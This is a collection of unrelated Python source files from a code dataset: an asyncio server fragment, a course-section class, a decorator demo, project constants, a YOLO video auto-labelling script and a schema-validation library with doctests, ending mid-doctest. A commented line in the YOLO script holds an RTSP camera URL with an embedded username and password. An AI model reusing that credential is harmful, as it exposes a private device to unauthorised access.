ServerWorker(conn_cnt, addr) \n data = yield from reader.read(max_msg_size)\n while True:\n if not data: continue\n if data[:1]==b'\\n': break\n data = srvwrk.process(data)\n if not data: break\n writer.write(data)\n yield from writer.drain()\n data = yield from reader.read(max_msg_size)\n print(\"[%d]\" % srvwrk.id)\n writer.close()\n\n\n\ndef run_server():\n loop = asyncio.get_event_loop()\n coro = asyncio.start_server(handle_echo, '127.0.0.1', conn_port, loop=loop)\n server = loop.run_until_complete(coro)\n # Serve requests until Ctrl+C is pressed\n print('Serving on {}'.format(server.sockets[0].getsockname()))\n print(' (type ^C to finish)\\n')\n try:\n loop.run_forever()\n except key1boardInterrupt:\n pass\n # Close the server\n server.close()\n loop.run_until_complete(server.wait_closed())\n loop.close()\n print('\\nFINISHED!')\n\nrun_server()\n\n","sub_path":"4_Ano/Criptografia/David_Alves_files/Feitos por mim/1819-G6-master/CliServ/servidor.py","file_name":"servidor.py","file_ext":"py","file_size_in_byte":9123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"490742443","text":"'''\n\n\tThe Course Section Class\n\n'''\n\nclass CourseSection(object):\n\tdef __init__(self, sectionID=None, name=\"New Course\"):\n\t\tsuper(CourseSection, self).__init__()\n\t\tself.sectionID = sectionID\n\t\tself.name = name\n\t\tself.numberOfCredits = 0\n\t\tself.numberOfHours = 0\n\t\tself.professorNames = list()\n\t\tself.status = \"\"\n\t\tself.meetingTimes = list()\n\t\tself.rooms = list()\n\n\tdef description(self):\n\t\tdescription = \"---Section:---\"\n\t\tdescription += \"\\n\"\n\t\tdescription += \"id: \" + str(self.sectionID)\n\t\tdescription += \"\\n\"\n\t\tdescription += \"time: \" \n\t\tdescription += self.listToString(self.meetingTimes)\n\t\tdescription += \"\\n\"\n\t\tdescription += \"room: \"\n\t\tdescription += self.listToString(self.rooms)\n\t\tdescription += \"\\n\"\n\t\tdescription += \"prof: \"\n\t\tdescription += self.listToString(self.professorNames)\n\t\tdescription += \"\\n\"\n\t\tdescription += \"stat: \"\n\t\tdescription += self.status\n\n\t\treturn description\n\n\tdef listToString(self, a_list=None):\n\t\t\n\t\treturn_string = \"\"\n\n\t\tif list:\n\t\t\tfor x in xrange(0, len(a_list)):\n\t\t\t\tif x != 0:\n\t\t\t\t\treturn_string += \", \"\n\n\t\t\t\treturn_string += a_list[x]\n\n\t\treturn return_string\n","sub_path":"walnut-lite/model/course_section.py","file_name":"course_section.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"42073054","text":"import functools\n\ndef log(func_or_text):\n if isinstance(func_or_text,str):\n def decorator(func):\n @functools.wraps(func)\n def wrapper(*args,**kw):\n print('begin call ' + func_or_text)\n res = func(*args,**kw)\n print('end call')\n return res\n return wrapper\n return decorator\n else:\n # log无参数,则传进来func_or_text的是函数\n @functools.wraps(func_or_text)\n def wrapper(*args,**kw):\n print('begin call')\n res = func_or_text(*args,**kw)\n print('end call')\n return res\n return wrapper\n\n@log\ndef f1(x):\n print('This is f1')\n return x*2 \n\n@log('execute')\ndef f2(x):\n print('This is f2')\n return x*3\n\nprint(f1(2))\n\nprint(f2(3))\n","sub_path":"t9.py","file_name":"t9.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"422528564","text":"from enum import Enum\n\nCONFIG_FILE = \"config.json\"\nCONFIG_YAML_NAME = \"mic.yaml\"\nINPUTS_KEY = \"inputs\"\nPARAMETERS_KEY = \"parameters\"\nCONFIG_FILE_KEY = \"configs\"\nSTEP_KEY = \"step\"\nOUTPUTS_KEY = \"outputs\"\nNAME_KEY = \"name\"\nDEFAULT_DESCRIPTION_KEY = \"description\"\nPATH_KEY = \"path\"\nDEFAULT_VALUE_KEY = \"default_value\"\nDATA_DIRECTORY_NAME = \"data\"\nRUN_FILE = \"run\"\nIO_FILE = \"io.sh\"\nOUTPUT_FILE = \"output.sh\"\nDOCKER_FILE = \"Dockerfile\"\nSRC_DIR = \"src\"\nDOCKER_DIR = \"docker\"\nMIC_CONFIG_FILE_NAME = \"MIC file\"\nDATA_DIR = \"data\"\nREQUIREMENTS_FILE = \"requirements.txt\"\nEXECUTIONS_DIR = \"executions\"\nTOTAL_STEPS = 8\nMINT_COMPONENT_ZIP = \"mint_component\"\nGIT_TOKEN_KEY = \"git_token\"\nGIT_USERNAME_KEY = \"git_username\"\nDOCKER_KEY = \"docker_image\"\nLAST_EXECUTION_DIR = \"last_execution_dir\"\nREPO_KEY = \"github_repo_url\"\nVERSION_KEY = \"version\"\nDOCKER_USERNAME_KEY = \"dockerhub_username\"\nMINT_COMPONENT_KEY = \"mint_component_url\"\nMINT_INSTANCE = \"https://w3id.org/okn/i/mint/\"\n\nTYPE_PARAMETER = \"https://w3id.org/okn/o/sd#Parameter\"\nTYPE_MODEL_CONFIGURATION = \"https://w3id.org/okn/o/sdm#ModelConfiguration\"\nTYPE_DATASET = \"https://w3id.org/okn/o/sd#DatasetSpecification\"\nTYPE_SOFTWARE_IMAGE = \"https://w3id.org/okn/o/sd#SoftwareImage\"\nTYPE_SOFTWARE_VERSION = \"https://w3id.org/okn/o/sd#SoftwareVersion\"\nGITIGNORE_FILE = \".gitignore\"\n\nDEFAULT_PARAMETER_COMMENT = \"# value added by MIC. Replace with your own default value\"\nDEFAULT_DESCRIPTION_MESSAGE = \"# insert description left of this comment\"\n\n# Default output messages\nDEFAULT_CONFIGURATION_WARNING = \"WARNING: The profile doesn't exists. To configure it, run:\\nmic configure -p\"\n\n\nclass Framework(Enum):\n PYTHON37 = (\"python3\", \"mintproject/base-ubuntu18:latest\", \".py\")\n #CONDA = (\"conda\", \"mintproject/conda:20.5.1\", \".py\")\n GENERIC = (\"general\", \"mintproject/base-ubuntu18:latest\")\n\n def __init__(self, label, image, extension=None):\n self.label = label\n self.image = image\n self.extension = extension\n\n def __str__(self):\n return self.label\n\n\ndef handle(value):\n for i in Framework:\n if value == i.label:\n return i\n","sub_path":"src/mic/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"107786542","text":"import sys\r\nimport os\r\nimport numpy as np\r\nimport cv2\r\nimport time\r\nimport copy\r\nfrom datetime import datetime\r\nfrom collections import OrderedDict\r\nimport argparse\r\nfrom lxml import etree\r\nimport xml.etree.cElementTree as ET\r\nfrom os.path import join\r\nfrom glob import glob\r\n\r\n\r\n\r\ndef main(video_name=\"\",output_video=\"\"):\r\n print(\"video\")\r\n def nonblank_lines(f):\r\n for l in f:\r\n line = l.rstrip()\r\n if line:\r\n yield line\r\n\r\n\r\n def write_xml(xml_str, xml_path):\r\n # remove blank text before prettifying the xml\r\n parser = etree.XMLParser(remove_blank_text=True)\r\n root = etree.fromstring(xml_str, parser)\r\n # prettify\r\n xml_str = etree.tostring(root, pretty_print=True)\r\n # save to file\r\n with open(xml_path, 'wb') as temp_xml:\r\n temp_xml.write(xml_str)\r\n\r\n\r\n def create_PASCAL_VOC_xml(xml_path, abs_path, folder_name, image_name, img_height, img_width, depth):\r\n # By: Jatin Kumar Mandav\r\n annotation = ET.Element('annotation')\r\n ET.SubElement(annotation, 'folder').text = folder_name\r\n ET.SubElement(annotation, 'filename').text = image_name\r\n ET.SubElement(annotation, 'path').text = abs_path\r\n source = ET.SubElement(annotation, 'source')\r\n ET.SubElement(source, 'database').text = 'Unknown'\r\n size = ET.SubElement(annotation, 'size')\r\n ET.SubElement(size, 'width').text = img_width\r\n ET.SubElement(size, 'height').text = img_height\r\n ET.SubElement(size, 'depth').text = depth\r\n ET.SubElement(annotation, 'segmented').text = '0'\r\n\r\n xml_str = ET.tostring(annotation)\r\n write_xml(xml_str, xml_path)\r\n\r\n def voc_format(class_name, point_1, point_2):\r\n # Order: class_name xmin ymin xmax ymax\r\n xmin, ymin = min(point_1[0], point_2[0]), min(point_1[1], point_2[1])\r\n xmax, ymax = max(point_1[0], point_2[0]), max(point_1[1], point_2[1])\r\n items = map(str, [class_name, xmin, ymin, xmax, ymax])\r\n\r\n return items\r\n \r\n def append_bb(ann_path, line, extension):\r\n if '.txt' in extension:\r\n with open(ann_path, 'a') as myfile:\r\n myfile.write(line + '\\n') # append line\r\n if '.xml' in extension:\r\n\r\n class_name, xmin, ymin, xmax, ymax = line\r\n\r\n tree = ET.parse(ann_path)\r\n annotation = tree.getroot()\r\n\r\n obj = ET.SubElement(annotation, 'object')\r\n ET.SubElement(obj, 'name').text = class_name\r\n ET.SubElement(obj, 'pose').text = 'Unspecified'\r\n ET.SubElement(obj, 'truncated').text = '0'\r\n ET.SubElement(obj, 'difficult').text = '0'\r\n\r\n bbox = ET.SubElement(obj, 'bndbox')\r\n ET.SubElement(bbox, 'xmin').text = xmin\r\n ET.SubElement(bbox, 'ymin').text = ymin\r\n ET.SubElement(bbox, 'xmax').text = xmax\r\n ET.SubElement(bbox, 'ymax').text = ymax\r\n\r\n xml_str = ET.tostring(annotation)\r\n write_xml(xml_str, ann_path)\r\n\r\n\r\n def get_annotation_paths(img_path, annotation_formats):\r\n annotation_paths = []\r\n for ann_dir, ann_ext in annotation_formats.items():\r\n new_path = os.path.join(OUTPUT_DIR, ann_dir)\r\n new_path = img_path.replace(INPUT_DIR, new_path, 1)\r\n pre_path, img_ext = os.path.splitext(new_path)\r\n new_path = new_path.replace(img_ext, ann_ext, 1)\r\n annotation_paths.append(new_path)\r\n return annotation_paths\r\n\r\n def save_bounding_box(annotation_paths, class_index, point_1, point_2, width, height):\r\n for ann_path in annotation_paths:\r\n if '.txt' in ann_path:\r\n line = yolo_format(class_index, point_1, point_2, width, height)\r\n append_bb(ann_path, line, '.txt')\r\n \r\n print(ann_path)\r\n if '.xml' in ann_path:\r\n line = voc_format(class_[class_index], point_1, point_2)\r\n append_bb(ann_path, line, '.xml')\r\n\r\n\r\n def yolo_format(class_index, point_1, point_2, width, height):\r\n # YOLO wants everything normalized\r\n # Order: class x_center y_center x_width y_height\r\n x_center = (point_1[0] + point_2[0]) / float(2.0 * width)\r\n y_center = (point_1[1] + point_2[1]) / float(2.0 * height)\r\n x_width = float(abs(point_2[0] - point_1[0])) / width\r\n y_height = float(abs(point_2[1] - point_1[1])) / height\r\n items = map(str, [class_index, x_center, y_center, x_width, y_height])\r\n return ' '.join(items)\r\n\r\n\r\n # Get the names of the output layers\r\n def getOutputsNames(net):\r\n # Get the names of all the layers in the network\r\n layersNames = net.getLayerNames()\r\n # Get the names of the output layers, i.e. the layers with unconnected outputs\r\n return [layersNames[i[0] - 1] for i in net.getUnconnectedOutLayers()]\r\n\r\n def drawPred(classId, conf, left, top, right, bottom):\r\n # Draw a bounding box.\r\n # if DEBUG:\r\n # cv2.rectangle(frame, (left, top), (right, bottom), (255, 255, 255), 1)\r\n # Draw a bounding box.\r\n \r\n\r\n label = '%.2f' % conf\r\n colorId = (0, 0, 255)\r\n\r\n print(classId)\r\n # Get the label for the class name and its confidence\r\n if class_:\r\n assert(classId < len(class_))\r\n label = '%s:%s' % (class_[classId], label)\r\n if classId == 0:\r\n colorId = (0,255,0)\r\n\r\n #Display the label at the top of the bounding box\r\n labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.5, 1)\r\n cv2.rectangle(frame, (left, top), (right, bottom), colorId, 3)\r\n top = max(top, labelSize[1])\r\n\r\n cv2.rectangle(frame, (left, top - round(1.5*labelSize[1])), (left + round(1.5*labelSize[0]), top + baseLine), (255,255,255), cv2.FILLED)\r\n # print(class_[classId])\r\n cv2.putText(frame, label, (left, top), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (0,0,0), 1)\r\n\r\n \r\n def postprocess(frame, outs):\r\n frameHeight = frame.shape[0]\r\n frameWidth = frame.shape[1]\r\n rects = []\r\n # Scan through all the bounding boxes output from the network and keep only the\r\n # ones with high confidence scores. Assign the box's class label as the class with the highest score.\r\n \r\n classIds = []\r\n confidences = []\r\n boxes = []\r\n star = time.time()\r\n lis = []\r\n check = []\r\n\r\n # [check.append(outs[count][n1,:]) for out in outs for detection in out ]\r\n [check.append(outs[count][n1,:]) for count,out in enumerate(outs) for n1 in np.where(outs[count][:,5:] != 0)[0]]\r\n \r\n\r\n for detection in check:\r\n scores = detection[5:]\r\n classId = np.argmax(scores)\r\n # if classId > 0:\r\n # continue\r\n confidence = scores[classId]\r\n if confidence > confThreshold:\r\n center_x = int(detection[0] * frameWidth)\r\n center_y = int(detection[1] * frameHeight)\r\n width = int(detection[2] * frameWidth)\r\n height = int(detection[3] * frameHeight)\r\n left = int(center_x - width / 2)\r\n top = int(center_y - height / 2)\r\n classIds.append(classId)\r\n confidences.append(float(confidence))\r\n boxes.append([left, top, width, height])\r\n\r\n endr = time.time()\r\n print(\"enumerate : {:.2f}ms\".format((endr - star)* 1000))\r\n # Perform non maximum suppression to eliminate redundant overlapping boxes with\r\n # lower confidences.\r\n indices = cv2.dnn.NMSBoxes(boxes, confidences, confThreshold, nmsThreshold)\r\n fClasses =[]\r\n for i in indices:\r\n i = i[0]\r\n box = boxes[i]\r\n left = box[0]\r\n top = box[1]\r\n width = box[2]\r\n height = box[3]\r\n # if top < 30 : #no detection above 30\r\n # continue\r\n bos = np.array([left,top,width,height])\r\n rects.append(bos.astype(\"int\"))\r\n fClasses.append(classIds[i])\r\n # box = np.array([left,top,left+width,top+height])\r\n # rects.append(box.astype(\"int\"))\r\n drawPred(classIds[i], confidences[i], left, top, left + width, top + height)\r\n return rects,fClasses\r\n\r\n DEBUG = True\r\n starting_time = time.time()\r\n\r\n # video_name= '/home/facit/Desktop/Videos/08-07-2018-13-50.avi'\r\n # video_name= '/home/facit/Desktop/Videos/2017-05-29-14-/2017-05-29-14-05-00.avi'\r\n # video_name= 'rtsp://admin:pakistan1947@192.168.2.61:554/profile3/media.smp'\r\n file_path, file_extension = os.path.splitext(video_name)\r\n\r\n file_extension = file_extension.replace('.', '_')\r\n file_path += file_extension\r\n video_name_ext = os.path.basename(file_path)\r\n if not os.path.exists(file_path):\r\n print(' Converting video to individual frames...')\r\n os.makedirs(file_path)\r\n\r\n\r\n confThreshold = 0.1 #Confidence threshold\r\n nmsThreshold = 0.1 #Non-maximum suppression threshold\r\n\r\n inpWidth = inpHeight = 416 #Height of network's input imageai #Width of network's input image\r\n OUTPUT_DIR =\"output\"\r\n INPUT_DIR = \"input\"\r\n classesFile = \"/home/facit/Desktop/Models/yolo.names\"\r\n classes = None\r\n modelConfiguration = \"/home/facit/Desktop/WeightsFilesBackup/allModel.cfg\"\r\n modelWeights = \"/home/facit/Desktop/WeightsFilesBackup/PeopleBest.weights\"\r\n\r\n annotation_formats = {'PASCAL_VOC' : '.xml', 'YOLO_darknet' : '.txt'}\r\n annotation_formats = {'PASCAL_VOC' : '.xml'}\r\n\r\n with open(classesFile, 'rt') as f:\r\n class_ = f.read().rstrip('\\n').split('\\n')\r\n print(class_)\r\n \r\n\r\n net = cv2.dnn.readNetFromDarknet(modelConfiguration, modelWeights)\r\n net.setPreferableBackend(cv2.dnn.DNN_BACKEND_CUDA)\r\n net.setPreferableTarget(cv2.dnn.DNN_TARGET_CUDA)\r\n\r\n execution_path = os.getcwd()\r\n cap = cv2.VideoCapture(video_name)\r\n frame_width = int(cap.get(3))\r\n frame_height = int(cap.get(4))\r\n video_last_name = video_name.split(\"\\\\\")\r\n fps = cap.get(cv2.CAP_PROP_FPS)\r\n codec=cap.get(cv2.CAP_PROP_FOURCC)\r\n out = cv2.VideoWriter(output_video,cv2.VideoWriter_fourcc('M','J','P','G'), fps,(frame_width, frame_height))\r\n\r\n # Check if camera opened successfully\r\n if (cap.isOpened()== False): \r\n print(\"Error opening video stream or file\")\r\n\r\n ret, frame = cap.read()\r\n # Select ROI\r\n cv2.namedWindow(\"frame\", cv2.WND_PROP_FULLSCREEN)\r\n\r\n frameHeight = frame_height\r\n frameWidth = frame_width\r\n i=0\r\n desired_img_format = '.jpg'\r\n inc = fps\r\n start_frame_number=0\r\n # cv2.setUseOptimized(False)\r\n while(cap.isOpened()):\r\n # Capture frame-by-frame\r\n \r\n ret, frame = cap.read()\r\n \r\n rects = []\r\n classes=[]\r\n \r\n if ret == True:\r\n cap.set(cv2.CAP_PROP_POS_FRAMES, start_frame_number)\r\n start_frame_number = start_frame_number +inc\r\n\r\n # frame = cv2.resize(frame,(int(inpWidth),int(inpHeight)))\r\n start_time = time.time()\r\n blob = cv2.dnn.blobFromImage(frame, 1/255, (inpWidth, inpHeight), [0,0,0], 1, crop=False)\r\n # Sets the input to the network\r\n net.setInput(blob)\r\n # Runs the forward pass to get output of the output layers\r\n outs = net.forward(getOutputsNames(net))\r\n frame_name = '{}_{}{}'.format(video_name_ext, i, desired_img_format)\r\n frame_path = os.path.join(file_path, frame_name)\r\n cv2.imwrite(frame_path, frame)\r\n # Remove the bounding boxes with low confidence\r\n rects,classes =postprocess(frame, outs)\r\n i+=1\r\n annotation_paths = get_annotation_paths(frame_path, annotation_formats)\r\n \r\n abs_path = os.path.abspath(frame_path)\r\n folder_name = os.path.dirname(frame_path)\r\n image_name = os.path.basename(frame_path)\r\n img_height, img_width, depth = (str(number) for number in frame.shape)\r\n\r\n if len(classes)>0:\r\n for ann_path in annotation_paths:\r\n if not os.path.isfile(ann_path):\r\n create_PASCAL_VOC_xml(ann_path, abs_path, folder_name, image_name, img_height, img_width, depth)\r\n\r\n\r\n for box, classId in zip(rects, classes):\r\n save_bounding_box(annotation_paths, classId, (int(box[0]), int(box[1])),(int(box[0]) + int(box[2]), int(box[1]) + int(box[3])), frameWidth, frameHeight)\r\n\r\n cv2.circle(frame, (0,0) , 4,(255,255,255), -1)\r\n end_time = time.time()\r\n # cv2.putText(frame, '{:.2f}ms'.format((end_time - start_time) * 1000), (40, 40), 0,fontScale=1, color=(0, 255, 0), thickness=2)\r\n print(\"FPS : {:.2f}ms\".format((end_time - start_time)* 1000))\r\n cv2.imshow(\"frame\",frame)\r\n out.write(frame)\r\n # Press Q on keyboard to exit\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n # Break the loop\r\n else: \r\n break\r\n\r\n\r\n # When everything done, release the video capture object\r\n cap.release()\r\n # out.release() \r\n cv2.destroyAllWindows()\r\n\r\n ending_time = time.time()\r\n print(\"FPS end : {:.2f}ms\".format((ending_time - starting_time)* 1000))\r\n\r\n\r\n\r\n# if __name__ == \"__main__\":\r\n \r\n\r\n\r\n\r\n# location=\"/home/facit/Downloads/Fertig/Fertig/\"\r\n# folder=location+\"*.mp4\"\r\n# # x-special/nautilus-clipboard\r\n# # file:///home/facit/Desktop/PythonLabelImage/newVideo/Mazz%20Check%20this%20video\r\n# # file = \"/home/facit/Desktop/PythonLabelImage/newVideo/video\"\r\n# # main(video_name=file)\r\n \r\n# print(folder)\r\n# # videofiles =[]\r\n# files = glob.glob(folder)\r\n# for file in files:\r\n# if os.path.isfile(file): \r\n# # videofiles.append(file)\r\n# print(file)\r\n# main(video_name=file)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n \r\n parser = argparse.ArgumentParser(description='Object Detection using YOLO in OPENCV')\r\n parser.add_argument('--image', help='Path to image file.')\r\n parser.add_argument('--video', help='Path to video file.')\r\n parser.add_argument('--folder', help='Path to video file.')\r\n fileTypes =('*.avi', '*.mp4','*.webm')\r\n args = parser.parse_args()\r\n if (args.video):\r\n # Open the video file\r\n if not os.path.isfile(args.video):\r\n print(\"Input video file \", args.video, \" doesn't exist\")\r\n sys.exit(1)\r\n video_name = args.video\r\n outputFile = video_name[:-4]+'resthead_output.avi'\r\n main(video_name=video_name,output_video= outputFile)\r\n\r\n\r\n if (args.folder):\r\n if os.path.exists(args.folder): \r\n files = []\r\n output_folder= join(args.folder, 'new')\r\n if not os.path.exists(output_folder):\r\n os.makedirs(output_folder)\r\n for ext in fileTypes:\r\n# import os\r\n files.extend(glob(join(args.folder, ext)))\r\n for filepath in files:\r\n print(filepath) \r\n if os.path.isfile(filepath):\r\n output_file = os.path.basename(filepath)\r\n # outputFile = video_name[:-4]+'_output.avi'\r\n filename = os.path.basename(filepath)\r\n outfile = filename[:-4]+'_output.avi'\r\n output_file = join(output_folder, outfile)\r\n print(\"Input video file \",filepath)\r\n print(output_file)\r\n main(video_name=filepath,output_video=output_file)\r\n","sub_path":"pyautoLabelImg.py","file_name":"pyautoLabelImg.py","file_ext":"py","file_size_in_byte":16845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"155388165","text":"import sys\nif sys.version < '3': # pragma: no cover\n unicode_type = unicode\n bytes_type = str\nelse: # pragma: no cover\n bytes_type = bytes\n unicode_type = str\n basestring = str\n\nimport vertigo as vg\n\nfrom .invalid import Invalid, InvalidAggregator\nfrom .base import Marker, traverse, validate, dictify, undictify, to_typegraph\nfrom .schema import Schema\n\nclass SchemaMapping(Schema):\n '''Marker for structured dicts.\n\n The children of this node in the typegraph indicate the types of the keyed\n attributes to traverse.\n\n >>> from collections import OrderedDict\n >>> from datetime import date\n >>> from . import Int, Date\n >>> G = vg.PlainGraphNode\n\n >>> bday = date(1985, 9, 16)\n >>> schema = G(SchemaMapping(), [(\"age\",G(Int())), (\"birthday\",G(Date()))])\n >>> def mk(age, birthday):\n ... return OrderedDict([('age', age), ('birthday', birthday)])\n >>> print(vg.ascii_tree(traverse(schema, mk(age=27, birthday=bday))))\n root: OrderedDict([('age', 27), ('birthday', datetime.date(1985, 9, 16))])\n +--age: 27\n +--birthday: datetime.date(1985, 9, 16)\n\n >>> validate(schema, mk(age=27, birthday=bday))\n >>> validate(schema, mk(age=27.1, birthday=\"not a date\"))\n Traceback (most recent call last):\n ...\n Invalid: age: [type_error], birthday: [type_error]\n\n >>> cstruct = dictify(schema, mk(age=27, birthday=bday))\n >>> cstruct == mk(age=27, birthday=u'1985-09-16')\n True\n >>> undictify(schema, cstruct) == mk(age=27, birthday=bday)\n True\n\n The 'extra_field_policy' flag should be 'save', 'discard', or 'error'. This\n controls what happens on undictifiance when unexpected fields are present.\n\n 'save': un/dictify preserves extra keys; validate ignores them\n\n >>> schema = G.build(dict(_self=SchemaMapping('save'), age=Int()))\n >>> v = undictify(schema, {'age':27, 'color':'blue'})\n >>> v == {'age': 27, 'color': 'blue'}\n True\n >>> validate(schema, v)\n >>> v = dictify(schema, {'age':27, 'color':'blue'})\n >>> v == {'age': 27, 'color': 'blue'}\n True\n\n 'discard': un/dictify discards extra keys; validate complains about them\n\n >>> schema = G.build(dict(_self=SchemaMapping('discard'), age=Int()))\n >>> v = undictify(schema, {'age':27, 'color':'blue'})\n >>> v == {'age': 27}\n True\n >>> validate(schema, v)\n >>> validate(schema, {'age':27, 'color':'blue'})\n Traceback (most recent call last):\n ...\n Invalid: unexpected_fields - {'keys': set(['color'])}\n >>> v = dictify(schema, {'age':27, 'color':'blue'})\n >>> v == {'age': 27}\n True\n\n 'error': undictify and validate complain; dictify discards\n\n >>> schema = G.build(dict(_self=SchemaMapping('error'), age=Int()))\n >>> v = undictify(schema, {'age':27, 'color':'blue'})\n Traceback (most recent call last):\n ...\n Invalid: unexpected_fields - {'keys': set(['color'])}\n >>> validate(schema, {'age':27, 'color':'blue'})\n Traceback (most recent call last):\n ...\n Invalid: unexpected_fields - {'keys': set(['color'])}\n >>> v = dictify(schema, {'age':27, 'color':'blue'})\n >>> v == {'age': 27}\n True\n\n >>> validate(schema, 12)\n Traceback (most recent call last):\n ...\n Invalid: type_error - Expected dict, got \n '''\n def __init__(self, extra_field_policy=\"discard\"):\n super(SchemaMapping, self).__init__()\n self.extra_field_policy=extra_field_policy\n\n@validate.when(SchemaMapping)\ndef validate_mapping(dispgraph, value, **kwargs):\n if not isinstance(value, dict):\n raise Invalid(\"type_error\", \"Expected dict, got {}\".format(type(value)))\n marker = dispgraph.marker\n error_agg = InvalidAggregator(autoraise = kwargs.get('fail_early', False))\n with error_agg.checking():\n dispgraph.super(SchemaMapping)(value, **kwargs)\n if marker.extra_field_policy in ['error', 'discard']:\n extra_keys = set(value.keys()) - set(dispgraph.key_iter())\n if extra_keys:\n error_agg.own_error(Invalid('unexpected_fields', keys=extra_keys))\n error_agg.raise_if_any()\n\n@dictify.when(SchemaMapping)\ndef dictify_mapping(dispgraph, value, **kwargs):\n marker = dispgraph.marker\n result = dispgraph.super(SchemaMapping)(value, **kwargs)\n if marker.extra_field_policy == 'save':\n for key in set(value.keys()) - set(dispgraph.key_iter()):\n result[key] = value[key]\n return result\n\n\n@undictify.when(SchemaMapping)\ndef undictify_mapping(dispgraph, value, **kwargs):\n marker = dispgraph.marker\n error_agg = InvalidAggregator(autoraise = kwargs.get('fail_early', False))\n with error_agg.checking():\n result = dispgraph.super(SchemaMapping)(value, **kwargs)\n extra_keys = set(value.keys()) - set(dispgraph.key_iter())\n if marker.extra_field_policy == 'error' and extra_keys:\n error_agg.own_error(Invalid('unexpected_fields', keys=extra_keys))\n elif marker.extra_field_policy == 'save':\n for key in extra_keys:\n result[key] = value[key]\n error_agg.raise_if_any()\n return result\n\n\nclass StrMapping(Marker):\n '''Marker for dicts with string keys and homogenous values.\n\n The sub child in the typegraph determines the types of the mapping's values.\n\n >>> from collections import OrderedDict\n >>> from vertigo import PlainGraphNode as G\n >>> from . import Int, Date, List\n >>> from datetime import date\n >>> StringToNumList = StrMapping().of(List().of(Int()))\n >>> example = OrderedDict([(\"foo\",[1,2,3,4]), (\"bar\",[6,12,-4])])\n >>> print(vg.ascii_tree(traverse(StringToNumList, example), sort=True))\n root: OrderedDict([('foo', [1, 2, 3, 4]), ('bar', [6, 12, -4])])\n +--bar: [6, 12, -4]\n | +--0: 6\n | +--1: 12\n | +--2: -4\n +--foo: [1, 2, 3, 4]\n +--0: 1\n +--1: 2\n +--2: 3\n +--3: 4\n >>> cstruct = dictify(StringToNumList, example)\n >>> cstruct == {'foo':[1,2,3,4], 'bar':[6,12,-4]}\n True\n >>> undictify(StringToNumList, cstruct) == example\n True\n >>> undictify(StringToNumList, None)\n Traceback (most recent call last):\n ...\n Invalid: type_error - Expected dict, got \n >>> undictify(StringToNumList, {12:[1,2,3]})\n Traceback (most recent call last):\n ...\n Invalid: value_error/bad_keys - Bad keys - {'keys': [12]}\n >>> validate(StringToNumList, example)\n >>> validate(StringToNumList, {'foo':[1,\"hi\",3]})\n Traceback (most recent call last):\n ...\n Invalid: foo: [1: [type_error]]\n >>> validate(StringToNumList, {12:[1,2,3]})\n Traceback (most recent call last):\n ...\n Invalid: value_error/bad_keys - Bad keys - {'keys': [12]}\n >>> validate(StringToNumList, 12)\n Traceback (most recent call last):\n ...\n Invalid: type_error - Expected dict, got \n\n >>> try:\n ... undictify(StringToNumList, OrderedDict([\n ... ('hello', None),\n ... ]))\n ... except Invalid as e:\n ... print(vg.ascii_tree(e.as_graph(), sort=True))\n root: []\n +--hello: [SingleInvalid('type_error',)]\n '''\n def of(self, sub):\n return vg.PlainGraphNode(self, sub = to_typegraph(sub))\n\n@traverse.when(StrMapping)\ndef traverse_strmap(dispgraph, value, zipgraph=None, **kwargs):\n edges = []\n valgraph = dispgraph['sub']\n valzip = zipgraph['sub'] if zipgraph else None\n for key, val in value.items():\n edges.append((key, valgraph(val, valzip, **kwargs)))\n v = value\n if zipgraph:\n v = (v, zipgraph.value)\n return vg.PlainGraphNode(v, edges)\n\n@undictify.when(StrMapping)\ndef undictify_strmap(dispgraph, value, **kwargs):\n if not isinstance(value, dict):\n raise Invalid(\"type_error\", \"Expected dict, got {}\".format(type(value)))\n # If fail_early is True, then gather all errors from this and its\n # children. Otherwise, just raise the first error we encounter.\n error_agg = InvalidAggregator(autoraise = kwargs.get('fail_early', False))\n data = {}\n bad_keys = []\n for key, val in value.items():\n if not isinstance(key, basestring):\n bad_keys.append(key)\n continue\n with error_agg.checking_sub(key):\n val = dispgraph['sub'](val, **kwargs)\n data[key] = val\n if bad_keys:\n with error_agg.checking():\n raise Invalid(\"value_error/bad_keys\", \"Bad keys\", keys=bad_keys)\n error_agg.raise_if_any()\n return data\n\n@dictify.when(StrMapping)\ndef dictify_strmap(dispgraph, value, **kwargs):\n sub = dispgraph['sub']\n return {key:sub(val, **kwargs) for (key, val) in value.items()}\n\n@validate.when(StrMapping)\ndef validate_strmap(dispgraph, value, **kwargs):\n if not isinstance(value, dict):\n raise Invalid(\"type_error\", \"Expected dict, got {}\".format(type(value)))\n error_agg = InvalidAggregator(autoraise = kwargs.get('fail_early', False))\n bad_keys = []\n for key, val in value.items():\n if not isinstance(key, basestring):\n bad_keys.append(key)\n continue\n with error_agg.checking_sub(key):\n dispgraph['sub'](val, **kwargs)\n if bad_keys:\n with error_agg.checking():\n raise Invalid(\"value_error/bad_keys\", \"Bad keys\", keys=bad_keys)\n error_agg.raise_if_any()\n\nclass UniMapping(Marker):\n '''Marker for dicts with homogenous keys and homogenous values.\n\n The key and val children in the typegraph determine the types of the\n mapping's keys and values, respectively.\n\n >>> from collections import OrderedDict\n >>> from vertigo import PlainGraphNode as G\n >>> from . import Int, Date, List\n >>> from datetime import date\n >>> DateToNumList = G.build(dict(\n ... _self=UniMapping(),\n ... key=Date(),\n ... val=dict(_self=List(), sub=Int()))\n ... )\n >>> d1, d2 = date(1985, 9, 16), date(1980, 3, 17)\n >>> example = OrderedDict([(d1,[1,2,3,4]), (d2,[6,12,-4])])\n >>> print(vg.ascii_tree(traverse(DateToNumList, example), sort=True))\n root: OrderedDict([(datetime.date(1985, 9, 16), [1, 2, 3, 4]), (datetime.date(1980, 3, 17), [6, 12, 